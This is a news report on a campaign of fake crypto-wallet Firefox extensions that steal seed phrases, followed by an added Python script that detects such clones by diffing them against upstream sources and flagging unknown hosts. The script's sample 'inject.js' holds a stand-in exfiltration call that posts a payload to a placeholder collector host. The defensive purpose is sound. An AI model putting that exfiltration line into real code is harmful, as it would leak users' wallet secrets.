Cybersecurity researchers have identified over 40 malicious browser extensions for Mozilla Firefox designed to steal cryptocurrency wallet credentials, putting users' digital assets at risk. The extensions masquerade as legitimate wallet tools from widely used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox.
The large-scale campaign has been active since at least April 2025, with new extensions uploaded to the Firefox Add-ons store as recently as last week. These malicious add-ons artificially inflate their popularity by adding hundreds of 5-star reviews, creating an illusion of authenticity and tricking unsuspecting users into installing them. Additionally, the threat actors use the same names and logos as legitimate wallet tools to bolster trust.
By cloning the source code of open-source extensions and injecting malicious functionality, these rogue extensions extract wallet keys and seed phrases from targeted websites and exfiltrate them to a remote server. They also transmit victims’ external IP addresses. Unlike typical phishing scams that rely on fake websites or emails, these extensions operate inside the user’s browser, making them harder to detect or block with traditional endpoint tools.
The presence of Russian language comments in the source code and metadata from a PDF file retrieved from the command-and-control server used for the activity points to a Russian-speaking threat actor group.
All identified add-ons, except for MyMonero Wallet, have since been removed by Mozilla. Last month, Mozilla announced that it is developing an early detection system to identify and block scam crypto wallet extensions before they gain popularity and trick users into entering the credentials that are then used to steal their assets.
To mitigate the risk posed by such threats, users are advised to install extensions only from verified publishers and to vet them, both before installation and after updates, to ensure they do not silently change their behavior once installed.
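The vetting step above can be partly automated for extensions that are clones of an open-source upstream: compare the installed files against the upstream release and inspect any added or modified file for network destinations the legitimate extension never contacts, which is where the injected exfiltration described earlier shows up. The following is an added example, not code from the researchers or from Mozilla; the file contents, the `api.wallet.example` allowlist and the `collector.invalid` host are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: an "upstream" open-source wallet extension and a candidate
# build cloned from it (hypothetical files, not any real extension's sources).
UPSTREAM = {
    "manifest.json": b'{"name": "Example Wallet", "version": "1.4.0"}',
    "background.js": b'fetch("https://api.wallet.example/v1/status");',
}
CANDIDATE = {
    "manifest.json": b'{"name": "Example Wallet", "version": "1.4.0"}',
    "background.js": b'fetch("https://api.wallet.example/v1/status");',
    # File present only in the clone; the collector host is a constructed placeholder.
    "inject.js": b'fetch("https://collector.invalid/upload", {method: "POST", body: payload});',
}
ALLOWED_HOSTS = {"api.wallet.example"}  # hosts the upstream extension legitimately contacts
URL_RE = re.compile(r"https?://[^\s\"'`)]+")

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def diff_against_upstream(upstream, candidate):
    """Classify candidate files as added, removed or modified relative to upstream."""
    added = sorted(set(candidate) - set(upstream))
    removed = sorted(set(upstream) - set(candidate))
    modified = sorted(f for f in set(upstream) & set(candidate)
                      if sha256(upstream[f]) != sha256(candidate[f]))
    return {"added": added, "removed": removed, "modified": modified}

def unexpected_hosts(source: bytes, allowed_hosts):
    """Return hosts referenced by a source file that are not on the allowlist."""
    urls = URL_RE.findall(source.decode("utf-8", "replace"))
    hosts = {urlparse(u).hostname for u in urls}
    return sorted(h for h in hosts if h and h not in allowed_hosts)

def vet_extension(upstream, candidate, allowed_hosts):
    """Flag files that diverge from upstream and any new network destinations in them."""
    report = diff_against_upstream(upstream, candidate)
    report["unexpected_hosts"] = {}
    for f in report["added"] + report["modified"]:
        hosts = unexpected_hosts(candidate[f], allowed_hosts)
        if hosts:
            report["unexpected_hosts"][f] = hosts
    return report

if __name__ == "__main__":
    print(vet_extension(UPSTREAM, CANDIDATE, ALLOWED_HOSTS))
```

A clean clone yields empty `added`, `modified` and `unexpected_hosts`; the sample clone is flagged for `inject.js` and its unknown collector host.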